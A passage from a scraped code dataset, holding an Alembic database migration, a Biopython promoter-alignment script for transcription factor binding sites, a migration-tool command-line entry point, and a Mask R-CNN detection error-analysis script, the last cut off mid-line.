"numpy.unravel_index", "line_number": 214, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 225, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 298, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 427, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 435, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 438, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 438, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 467, "usage_type": "call"}, {"api_name": "os.path", "line_number": 467, "usage_type": "name"}, {"api_name": "networkx.DiGraph", "line_number": 498, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path", "line_number": 586, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 587, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}]}
+{"seq_id": "19628616589", "text": "\"\"\"add rendered to messages\n\nRevision ID: 7563cb70be2d\nRevises: f33cced0cb75\nCreate Date: 2022-05-14 10:06:18.749900+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlmodel\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"7563cb70be2d\"\ndown_revision = \"f33cced0cb75\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"messages\",\n sa.Column(\n \"rendered\",\n sqlmodel.sql.sqltypes.AutoString(),\n ),\n )\n # ### end Alembic commands ###\n\n # Set the rendered value to the current content and then make it non-null\n op.execute(\"UPDATE messages SET rendered = content\")\n op.alter_column(\"messages\", \"rendered\", nullable=False)\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"messages\", \"rendered\")\n # ### end Alembic commands ###\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "common/database/migrations/versions/7563cb70be2d_add_rendered_to_messages.py", "file_name": "7563cb70be2d_add_rendered_to_messages.py", "file_ext": "py", "file_size_in_byte": 953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlmodel.sql.sqltypes.AutoString", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlmodel.sql", "line_number": 25, "usage_type": "attribute"}, {"api_name": "alembic.op.execute", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "32899997897", "text": "import Bio.pairwise2 as pairwise2\nfrom Bio.pairwise2 import format_alignment\nimport Bio.motifs as motifs\nimport csv\nimport time\nimport re\n\nclass SubUnit_Object(object): \n def __init__(self, Cell_ID, Pathway, Reaction, Enzyme, SubUnit, Promoter_Sequence, Hash):\n self.Cell_Line = Cell_ID #The cell line this enzyme is found at. \n self.Pathway_ID = Pathway #Identity of the pathway this subunit serves.\n self.Reaction_ID = Reaction #Identity of the reaction this subunit serves.\n self.Enzyme_ID = Enzyme #Identity of the enzyme that contains this subunit. \n self.SubUnit_ID = SubUnit #ID of this subunit.\n self.Sequence = Promoter_Sequence #Promoter sequence of this subunit.\n self.Putative_Site = [] #Putative sites that has an impact on this subunit. In form of a list of dictionaries.\n self.Hash = Hash\n\n def read_site(self, Site_ID, Site_Location, Site_Sequence, Site_RC):\n #Takes input from file to create a list of dictionaries. \n self.Putative_Site.append({\"Site_ID\": Site_ID, \"Start_Location\": int(Site_Location),\n \"End_Location\": int(Site_Location) + len(Site_Sequence),\n \"Site_Sequence\": Site_Sequence, \"Reverse_Complement\": Site_RC})\n \n def align(self, Compared_Object, start=0, end=0, OpG_Penalty=-10, ExG_Penalty=-1, EndG_Penalty = False): \n #Align a given subunit or putative site to a part of this object. \n end = len(self.Sequence) if end == 0 else end\n Interest_Sq = self.Sequence[start:end].upper() #Sequence that we are interested to check. Is equal to entire sequence if no start and end location is given.\n Compared_Sq = Compared_Object if type(Compared_Object) == str else Compared_Object.Sequence.upper() #Sequence that we comparing.\n if Interest_Sq == \"\":\n return[[\"-\",\"-\",0]]\n Needleman = pairwise2.align.globalms(Interest_Sq, Compared_Sq, 5, -4, OpG_Penalty, ExG_Penalty, penalize_end_gaps = EndG_Penalty)\n return Needleman\n\n def find_site(self, Reference_Sq, Known_Coordinates, Index=0, Slash_Count=0, Is_End=0, Aligned=0): \n Updated_Start = 0\n Updated_End = 0\n \n if Aligned == 0:\n #Count number of slashes before the putative site. Do not count slashes as characters so that the final value of the while loop is \n # equal to initial location of the site.\n Known_Location = Known_Coordinates[1] if Is_End == 1 else Known_Coordinates[0] + 1\n while Index < Known_Location:\n if Reference_Sq[Index + Slash_Count] == \"-\":\n Slash_Count = Slash_Count + 1\n else:\n Index = Index + 1\n Updated_Start = Known_Location + Slash_Count if Is_End == 1 else Known_Location + Slash_Count - 1\n #After finding the initial location, call the function recursively but this time to find the new end location. \n if Is_End == 0:\n Updated_End = self.find_site(Reference_Sq, Known_Coordinates, Index, Slash_Count, Is_End=1)\n if Is_End == 1:\n return Updated_Start \n else:\n #If transferring from aligned to actual, remove slashes from before and within the sequence. \n Slash_Before_Start = Reference_Sq[0:Known_Coordinates[0]+1].count(\"-\")\n Slash_Before_End = Reference_Sq[0:Known_Coordinates[1]].count(\"-\")\n Shift = Slash_Before_End - Slash_Before_Start #If any gaps where removed from within the corresponding region, pull 1 char from both sides to make up for it. \n if Shift == Known_Coordinates[1] - Known_Coordinates[0] - 1: #If there are no matching sites corresponding to the sequence just return an emptry string location.\n return [0, 0]\n Updated_Start = Known_Coordinates[0] - Slash_Before_Start - Shift\n Updated_End = Known_Coordinates[1] - Slash_Before_End + Shift \n return [Updated_Start, Updated_End]\n\n def refine(self, ComparisonList):\n RefinedSites = []\n for Comparison in ComparisonList:\n string = Comparison[1]\n slashes = re.finditer(\"-\", string)\n match_pos = [slash.start() for slash in slashes]\n match_pos.insert(0, -1)\n match_pos.append(len(string)+1)\n\n for ind in range(len(match_pos)):\n if match_pos[ind+1] - match_pos[ind] > 1:\n start_str, end_str = match_pos[ind], match_pos[ind+1]\n break;\n RefinedSites.append(Comparison[0][start_str+1:end_str]) \n return RefinedSites\n\n def compare(self, Compared_Object):\n Alignment = self.align(Compared_Object)\n Alignment = Alignment[0]\n for Item in Compared_Object.Putative_Site:\n Aligned_Site_Locations = self.find_site(Alignment[1] , [Item[\"Start_Location\"], Item[\"End_Location\"]])\n Translated_Site_Locations = self.find_site(Alignment[0], Aligned_Site_Locations, Aligned = 1)\n if Translated_Site_Locations == [0,0]:\n continue;\n Hit_Achieved_Zone = self.Sequence[Translated_Site_Locations[0]:Translated_Site_Locations[1]]\n if len(Hit_Achieved_Zone) == len(Item[\"Site_Sequence\"]):\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100, EndG_Penalty = True)\n else:\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100)\n if Comparison[0][2] >= len(Item[\"Site_Sequence\"])*2 and \"-\" not in Comparison[0][0]:\n if len(Item[\"Site_Sequence\"]) < len(Hit_Achieved_Zone):\n Hit_Achieved_Zone = self.refine(Comparison)\n self.Putative_Site.append({\"Site_ID\": Item[\"Site_ID\"], \"Start_Location\": Translated_Site_Locations[0],\n \"End_Location\": Translated_Site_Locations[1], \"Site_Sequence\": Hit_Achieved_Zone,\n \"Motif\": Item[\"Site_Sequence\"], \"Reverse_Complement\": Item[\"Reverse_Complement\"]}) \n\n def count_site(self, Database_Directory):\n Site_Counts = {}\n with open(Database_Directory) as Database:\n for Motif in motifs.parse(Database, \"jaspar\"):\n Count = 0\n for Sites in self.Putative_Site:\n if Motif.name == Sites[\"Site_ID\"]:\n Count = Count + 1\n if Count == 0:\n continue;\n Site_Counts[Motif.name] = Count\n return Site_Counts\n \n def write(self, Database_Directory):\n Site_Counts = self.count_site(Database_Directory)\n Total_Count = sum(Site_Counts.values())\n Record = {\"Cell ID\": self.Cell_Line, \"Pathway\": self.Pathway_ID, \"Enzyme\": self.Enzyme_ID, \n \"Reaction\": self.Reaction_ID, \"SubUnit\": self.SubUnit_ID, \"Promoter\": self.Sequence, \n \"Sites\": self.Putative_Site, \"Site Counts\": Site_Counts, \"Site Index\": Total_Count/len(self.Sequence), \"Hash\" : self.Hash}\n return Record\n\ndef read_csv(csv_directory, File_Type):\n with open(csv_directory) as csv_file:\n Mode = \"\"\n if File_Type == \"Reference\":\n Reference_Dictionary_List = []\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n Reader = csv.reader(csv_file, delimiter = \";\")\n for Row in Reader:\n #Read the current program and adjust what program is doing with respect to what you read.\n if Row == []:\n continue;\n Mode = (\"Read Sequence\" if Row[0] == \"Cell ID\" else \n (\"Read Factor\" if Row[0] == \"HIT ID\" else Mode))\n if (Row[0] == \"Enzyme ID\") or (Row[0] == \"HIT ID\"):\n continue;\n elif Row[0] == \"NULL\":\n Temporary_Dictionary[\"Sites\"] = Temporary_Site_List\n Reference_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n continue;\n #If the mode of the program is set, and its not a mode changing location, read the data.\n if Mode == \"Read Sequence\":\n Temporary_Dictionary = {\"Cell ID\": Row[0], \"Pathway\": Row[1], \"Reaction\": Row[2],\n \"Enzyme\": Row[3], \"SubUnit\": Row[4], \"Promoter\": Row[5], \"Hash\": Row[7]}\n elif Mode == \"Read Factor\":\n factorPosition = int(Row[1]) if int(Row[1]) >= 0 else len(Temporary_Dictionary[\"Promoter\"]) + int(Row[1])\n reverseComplement = 1 if int(Row[1]) <= 0 else 0\n Temporary_Site_List.append([Row[0], factorPosition, Row[5], reverseComplement])\n return Reference_Dictionary_List\n elif File_Type == \"Comparison\":\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n Compared_Dictionary_List = []\n Temporary_Dictionary = {\"Cell ID\": \"\"} \n Hash_Tracker = [] \n for Row in Reader:\n if Row[\"Hash\"] in Hash_Tracker:\n continue;\n Hash_Tracker.append(Row[\"Hash\"])\n if Row[\"Compared Gene Name\"] == \"\":\n continue;\n Temporary_Dictionary[\"Cell ID\"] = Row[\"Compared Cell Line\"] if Temporary_Dictionary[\"Cell ID\"] == \"\" else Temporary_Dictionary[\"Cell ID\"] \n Temporary_Dictionary[\"SubUnit\"] = Row[\"Compared Gene Name\"]\n Temporary_Dictionary[\"Promoter\"] = Row[\"Compared Sequence\"]\n Temporary_Dictionary[\"Hash\"] = Row[\"Hash\"]\n if Row[\"Pathway\"] != \"\":\n Temporary_Dictionary[\"Pathway\"] = Row[\"Pathway\"]\n if Row[\"Reaction\"] != \"\":\n Temporary_Dictionary[\"Reaction\"] = Row[\"Reaction\"]\n if Row[\"Compared Enzyme\"] != \"\":\n Temporary_Dictionary[\"Enzyme\"] = Row[\"Compared Enzyme\"]\n \n Compared_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n return Compared_Dictionary_List \n elif File_Type == \"Pathway\":\n Pathway_Dict = {}\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n for Row in Reader:\n if Row[\"Pathway\"] != \"\":\n Pathway_Dict[Row[\"Pathway\"]] = {}\n else:\n Row[\"Pathway\"] = list(Pathway_Dict.keys())[-1] \n if Row[\"Compared Enzyme\"] != \"\": \n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]] = {}\n else:\n Row[\"Compared Enzyme\"] = list(Pathway_Dict[Row[\"Pathway\"]].keys())[-1]\n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]][Row[\"Compared Gene Name\"]] = {}\n return Pathway_Dict \n\ndef measure_key_frequency(dict_of_dicts):\n frequency = {}\n for d in dict_of_dicts.values():\n for key in d.keys():\n frequency[key] = 1 if key not in frequency else frequency[key] + 1\n return frequency\n\ndef reverseComplement(sequence):\n complement = {\"A\": \"T\", \"T\": \"A\", \"C\": \"G\", \"G\":\"C\"}\n reverseSq = sequence[::-1]\n reverseComplementSq = \"\"\n for char in reverseSq:\n char = char.upper()\n reverseComplementSq += complement[char]\n return reverseComplementSq\n\nif __name__ == \"__main__\": \n Comparison_Directory = input(\"Please enter Comparison List directory\")\n Reference_Directory = input(\"Please enter Scanner Results' directory\")\n Database_Directory = input(\"Please enter Putative Site database directory\")\n start = time.time()\n\n Reference_Sequence_Dictionary = read_csv(Reference_Directory, \"Reference\")\n Compared_Sequence_Dictionary = read_csv(Comparison_Directory, \"Comparison\")\n Pathway_Dictionary = read_csv(Comparison_Directory, \"Pathway\")\n \n Result_Dictionary = {}\n SubResults = open(\"SubunitWideAnalysis.csv\", \"w\")\n SubResult_Writer = csv.writer(SubResults, delimiter = \";\")\n Enzyme_Results = open(\"EnzymeWideAnalysis.csv\", \"w\")\n EnzymeResult_Writer = csv.writer(Enzyme_Results, delimiter = \";\")\n Pathway_Results = open(\"PathwayWideAnalysis.csv\", \"w\")\n PathwayResult_Writer = csv.writer(Pathway_Results, delimiter = \";\")\n \n for SUBUNIT in Compared_Sequence_Dictionary:\n Compared_Sequence = SubUnit_Object(SUBUNIT[\"Cell ID\"], SUBUNIT[\"Pathway\"], SUBUNIT[\"Reaction\"],\n SUBUNIT[\"Enzyme\"], SUBUNIT[\"SubUnit\"], SUBUNIT[\"Promoter\"], SUBUNIT[\"Hash\"])\n for REFERENCE in Reference_Sequence_Dictionary:\n if SUBUNIT[\"Hash\"] == REFERENCE[\"Hash\"]:\n Reference_Sequence = SubUnit_Object(REFERENCE[\"Cell ID\"], REFERENCE[\"Pathway\"], REFERENCE[\"Reaction\"],\n REFERENCE[\"Enzyme\"], REFERENCE[\"SubUnit\"], REFERENCE[\"Promoter\"], REFERENCE[\"Hash\"])\n for Site in REFERENCE[\"Sites\"]: \n Reference_Sequence.read_site(Site[0],Site[1],Site[2], Site[3])\n Compared_Sequence.compare(Reference_Sequence)\n Resulting_Object = Compared_Sequence.write(Database_Directory)\n if SUBUNIT[\"SubUnit\"] in Result_Dictionary.keys():\n if type(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]) != list:\n print(\"{}:\\t{}\".format(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"], Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]))\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"] = [Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]]\n print(\"{}:\\t{}\".format(Resulting_Object[\"Hash\"], Resulting_Object[\"Site Counts\"]))\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] = Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Sites\"] + Resulting_Object[\"Sites\"]\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"].append(Resulting_Object[\"Hash\"])\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"] = {k: Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].get(k, 0) + Resulting_Object[\"Site Counts\"].get(k, 0) for k in set(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]) | set(Resulting_Object[\"Site Counts\"])}\n Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Index\"] = sum(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"].values())/len(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Promoter\"])\n else:\n Result_Dictionary[SUBUNIT[\"SubUnit\"]] = Resulting_Object\n\n for Pathway_Key in Pathway_Dictionary.keys():\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key] = Result_Dictionary[SubUnit_Key]\n \n for Pathway_Key in Pathway_Dictionary.keys():\n Pathway_Sites_Dict = {}\n Pathway_Common_Keys = []\n for Enzyme_Key in Pathway_Dictionary[Pathway_Key].keys():\n Enzyme_Sites_Dict = {}\n Enzyme_Common_Keys = []\n for SubUnit_Key in Pathway_Dictionary[Pathway_Key][Enzyme_Key].keys():\n Pathway_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Sites_Dict[SubUnit_Key] = (Pathway_Dictionary[Pathway_Key][Enzyme_Key][SubUnit_Key][\"Site Counts\"])\n Enzyme_Key_Frequency = measure_key_frequency(Enzyme_Sites_Dict)\n for Key in Enzyme_Key_Frequency:\n if Enzyme_Key_Frequency[Key] >= len(Enzyme_Sites_Dict)*0.15:\n Enzyme_Common_Keys.append([Key , Enzyme_Key_Frequency[Key]/len(Enzyme_Sites_Dict)])\n EnzymeResult_Writer.writerow([Pathway_Key, Enzyme_Key, Enzyme_Common_Keys])\n\n Pathway_Key_Frequency = measure_key_frequency(Pathway_Sites_Dict)\n for Key in Pathway_Key_Frequency:\n if Pathway_Key_Frequency[Key] >= len(Pathway_Sites_Dict)*0.15:\n Pathway_Common_Keys.append([Key, Pathway_Key_Frequency[Key]/len(Pathway_Sites_Dict)])\n PathwayResult_Writer.writerow([Pathway_Key, Pathway_Common_Keys])\n\n tf_Dict = {}\n for Key in Result_Dictionary.values():\n SubResult_Writer.writerow(list(Key.values()))\n for Site in Key[\"Sites\"]:\n if Site[\"Site_ID\"] in tf_Dict.keys():\n if type(Site[\"Site_Sequence\"]) == str:\n correctedSq = reverseComplement(Site[\"Site_Sequence\"]) if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]].append(correctedSq)\n else:\n correctedSq = [reverseComplement(Sq) for Sq in Site[\"Site_Sequence\"]] if Site[\"Reverse_Complement\"] == 1 else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = tf_Dict[Site[\"Site_ID\"]] + correctedSq\n else:\n Site_Sequence_List = [Site[\"Site_Sequence\"]] if type(Site[\"Site_Sequence\"]) == str else Site[\"Site_Sequence\"]\n tf_Dict[Site[\"Site_ID\"]] = [reverseComplement(Sq) for Sq in Site_Sequence_List] if Site[\"Reverse_Complement\"] == 1 else Site_Sequence_List\n \n tf_Matrix_Dict = {}\n for Key in tf_Dict.keys():\n seqList = tf_Dict[Key]\n fm = []\n for i in range(len(seqList[0])):\n fm.append({'A':0, 'C':0, 'T':0, 'G':0})\n for site in seqList:\n site = site.upper()\n fm[i][site[i]] = fm[i][site[i]] + 1\n tf_Matrix_Dict[Key] = fm\n\n with open(\"site.txt\",\"w\") as siteRes:\n for Key in tf_Matrix_Dict.keys():\n siteRes.write(\"> \" + Key + \"\\n\")\n for base in [\"A\",\"C\",\"G\",\"T\"]:\n siteRes.write(base + \" [\")\n for loc in tf_Matrix_Dict[Key]:\n digit = loc[base]\n siteRes.write(\"{:>6}\".format(digit))\n siteRes.write(\" ]\\n\")\n siteRes.write(\"\\n\")\n\n with open(\"targetTFs.txt\",\"w\") as targetTFs:\n for Key in [\"ADR1\", \"CAT8\", \"SIP4\", \"HAP234\", \"RDS2\", \"YBR239C\", \n \"STB5\", \"MSN2\", \"MSN4\", \"MIG1\", \"TYE7\", \"GCR1\"]:\n if Key in tf_Dict.keys(): \n targetTFs.write(\"{} \\n\".format(Key))\n for SiteSequence in tf_Dict[Key]:\n targetTFs.write(\"{} \\n\".format(SiteSequence))\n else:\n continue\n\n end = time.time()\n print(\"Run Time: %.3f\" %(end-start))\n", "repo_name": "Biocatalysis-CHE-METU/TFBS-Analysis-of-Pichia-pastoris", "sub_path": "Searching Algorithm/Aligner.py", "file_name": "Aligner.py", "file_ext": "py", "file_size_in_byte": 18832, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Bio.pairwise2.align.globalms", "line_number": 32, "usage_type": "call"}, {"api_name": "Bio.pairwise2.align", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Bio.pairwise2", "line_number": 32, "usage_type": "name"}, {"api_name": "re.finditer", "line_number": 69, "usage_type": "call"}, {"api_name": "Bio.motifs.parse", "line_number": 104, "usage_type": "call"}, {"api_name": "Bio.motifs", "line_number": 104, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 129, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 154, "usage_type": "call"}, {"api_name": "csv.DictReader", "line_number": 179, "usage_type": "call"}, {"api_name": "time.time", "line_number": 212, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 220, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 222, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 224, "usage_type": "call"}, {"api_name": "time.time", "line_number": 322, "usage_type": "call"}]}
+{"seq_id": "32006517156", "text": "import argparse\n\nfrom migration.config import (\n document_cfgs,\n source_db_cfg,\n destination_db_cfg,\n internal_db_cfg,\n)\nfrom migration.migration_utility.configuration.db_configuration import DbConfigurator\nfrom migration.migration_utility.configuration.document_configuration import (\n DocumentConfiguration,\n)\nfrom migration.migration_utility.controller.migration_controller import (\n MigrationController,\n)\nimport sys\n\n\ndef main(\n reset_migration: bool = False,\n force_migration: bool = False,\n flow: str = \"flat\"\n):\n \"\"\"main.\"\"\"\n\n document_config_models = [DocumentConfiguration(**cfg) for cfg in document_cfgs]\n source_db_cfg_model = DbConfigurator(**source_db_cfg)\n destination_db_cfg_model = DbConfigurator(**destination_db_cfg)\n internal_db_cfg_model = DbConfigurator(**internal_db_cfg)\n\n migration_ctrl = MigrationController(\n source_db_config=source_db_cfg_model,\n destination_db_config=destination_db_cfg_model,\n internal_db_config=internal_db_cfg_model,\n document_configs=document_config_models,\n flow=flow\n )\n\n migration_ctrl.migrate(reset_migration=reset_migration, force_migration=force_migration)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--reset\", action=\"store_true\", help=\"Resets all previously migrated documents to is_migrated=True state\")\n parser.add_argument(\"--force\", action=\"store_true\", help=\"Forces a repeated migration over all documents\")\n parser.add_argument(\"--id_list_path\", default=None, help=\"Path to a file with list of IDs to migrate\")\n parser.add_argument(\"--flow\", default=\"flat\", help=\"Specifies the migration flow\")\n\n args = parser.parse_args()\n\n main(\n reset_migration=args.reset,\n force_migration=args.force,\n flow=args.flow\n )\n", "repo_name": "tigrankh/migration", "sub_path": "migration/migrate.py", "file_name": "migrate.py", "file_ext": "py", "file_size_in_byte": 1860, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "migration.migration_utility.configuration.document_configuration.DocumentConfiguration", "line_number": 26, "usage_type": "call"}, {"api_name": "migration.config.document_cfgs", "line_number": 26, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 27, "usage_type": "call"}, {"api_name": "migration.config.source_db_cfg", "line_number": 27, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 28, "usage_type": "call"}, {"api_name": "migration.config.destination_db_cfg", "line_number": 28, "usage_type": "name"}, {"api_name": "migration.migration_utility.configuration.db_configuration.DbConfigurator", "line_number": 29, "usage_type": "call"}, {"api_name": "migration.config.internal_db_cfg", "line_number": 29, "usage_type": "name"}, {"api_name": "migration.migration_utility.controller.migration_controller.MigrationController", "line_number": 31, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 43, "usage_type": "call"}]}
+{"seq_id": "30298996547", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom PIL.ImageDraw import Draw\nfrom PIL import Image, ImageFont\nimport matplotlib.pyplot as plt\nimport os\nimport xml.etree.ElementTree as ET\nfrom os import listdir\nfrom os.path import isfile, join\nimport torch\nimport numpy as np\nimport pdb\nfrom maskrcnn_benchmark.structures.bounding_box import BoxList\n\ndef preprocess_annotation(target):\n boxes = []\n gt_classes = []\n difficult_boxes = []\n TO_REMOVE = 1\n\n for obj in target.iter(\"object\"):\n difficult = int(obj.find(\"difficult\").text) == 1\n if difficult:\n continue\n name = obj.find(\"name\").text.lower().strip()\n bb = obj.find(\"bndbox\")\n # Make pixel indexes 0-based\n # Refer to \"https://github.com/rbgirshick/py-faster-rcnn/blob/master/lib/datasets/pascal_voc.py#L208-L211\"\n box = [\n bb.find(\"xmin\").text,\n bb.find(\"ymin\").text,\n bb.find(\"xmax\").text,\n bb.find(\"ymax\").text,\n ]\n bndbox = tuple(\n map(lambda x: x - TO_REMOVE, list(map(int, box)))\n )\n\n boxes.append(bndbox)\n gt_classes.append(name)\n difficult_boxes.append(difficult)\n\n size = target.find(\"size\")\n im_info = tuple(map(int, (size.find(\"height\").text, size.find(\"width\").text)))\n\n res = {\n \"boxes\": torch.tensor(boxes, dtype=torch.float32),\n \"labels\": gt_classes,\n \"difficult\": torch.tensor(difficult_boxes),\n \"im_info\": im_info,\n }\n return res\n\ndef boxlist_iou(boxList1, boxList2):\n #INTERSEZIONE\n\n if boxList1.size != boxList2.size:\n raise RuntimeError(\"boxlists should have the same image size, got {}, {}\".format(boxList1, boxList2))\n\n boxList1 = boxList1.convert(\"xyxy\")\n boxList2 = boxList2.convert(\"xyxy\")\n\n area1 = boxList1.area()\n area2 = boxList2.area()\n\n box1, box2 = boxList1.bbox, boxList2.bbox\n\n lt = torch.max(box1[:, None, :2], box2[:, :2]) # [N,M,2]\n rb = torch.min(box1[:, None, 2:], box2[:, 2:]) # [N,M,2]\n\n TO_REMOVE = 1\n\n wh = (rb - lt + TO_REMOVE).clamp(min=0) # [N,M,2]\n inter = wh[:, :, 0] * wh[:, :, 1] # [N,M]\n ###############\n #AREA \n #area1 = (boxList1[:, 2] - boxList1[:, 0] + TO_REMOVE) * (boxList1[:, 3] - boxList1[:, 1] + TO_REMOVE)\n #area2 = (boxList2[:, 2] - boxList2[:, 0] + TO_REMOVE) * (boxList2[:, 3] - boxList2[:, 1] + TO_REMOVE)\n #IoU\n iou = inter / (area1[:, None] + area2 - inter)\n \n return iou\n\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--target', type=str, help='Dataset root dir')\nparser.add_argument('--detections', type=str, help=\"Saved Detections .pth file\")\nparser.add_argument('--anno_path', type=str, help='Path to annotations .xml')\nparser.add_argument('--n_most_conf', type=int, default=2000, help='Number of most confidence predictions to condider for the Error Analysis')\nparser.add_argument('--subset_classes', nargs='+', help=\"List of classes to consider\")\nargs = parser.parse_args()\n\nvoc_classes = [\"__background__\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\n\ncityscapes_classes = [\"__background__ \",\"person\",\"rider\",\"car\",\"truck\",\"bus\",\"train\",\"motorcycle\",\"bicycle\"]\n\n\nclasses = voc_classes\n\nif args.subset_classes is not None:\n sub_set_classes = args.subset_classes\nelse:\n sub_set_classes = classes\n\ndetections = torch.load(open(args.detections, 'rb'))\n\nlines = open(os.path.join(args.target, 'ImageSets', 'Main', 'test.txt'), 'r').readlines()\nlines = [l.strip() for l in lines]\n\nassert len(lines) == len(detections)\n\nall_info = [] \n\nfor i in range(len(lines)): \n\n if (detections[i].bbox.shape[0] == 0):\n #questo caso significa che per quella immagine non ci sono predizioni della rete, cioè FN)\n continue\n\n\n annotations = ET.parse(args.anno_path + lines[i] +'.xml').getroot()\n immage_info = preprocess_annotation(annotations)\n\n if (immage_info[\"boxes\"].shape[0] == 0):\n #caso penso impossibile, cioè ground-truth image without bbox\n continue\n\n\n im_height, im_width = immage_info[\"im_info\"]\n detections[i] = detections[i].resize((im_width, im_height))\n\n detections[i].bbox[:, 2:] += 1\n immage_info[\"boxes\"][:, 2:] += 1\n\n iou_res = boxlist_iou(BoxList(detections[i].bbox.numpy(),(im_width, im_height)), BoxList(immage_info[\"boxes\"].numpy(), (im_width, im_height))).numpy()\n\n gt_index = iou_res.argmax(axis=1)\n iou_with_gt = iou_res.max(axis=1)\n\n del iou_res\n\n\n for k in range(len(detections[i].extra_fields['labels'])):\n\n temp_dict = {}\n temp_dict[f\"{i}_{k}\"] = k\n temp_dict[\"label_p\"] = classes[detections[i].extra_fields['labels'][k]]\n\n temp_dict[\"label_gt\"] = immage_info[\"labels\"][gt_index[k]]\n temp_dict[\"score\"] = detections[i].extra_fields['scores'].numpy()[k]\n temp_dict[\"iou_gt\"] = iou_with_gt[k]\n\n if temp_dict[\"label_gt\"] in sub_set_classes:\n all_info.append(temp_dict)\n\n\n\ndef take_score(elem):\n return elem[\"score\"]\n\nall_info_sort = sorted(all_info, key=take_score, reverse=True)\n\n#ERROR ANALYSIS\n\n#prendo i primi 1000 most confidence predictions\nn_most_conf = args.n_most_conf \nall_info_sort = 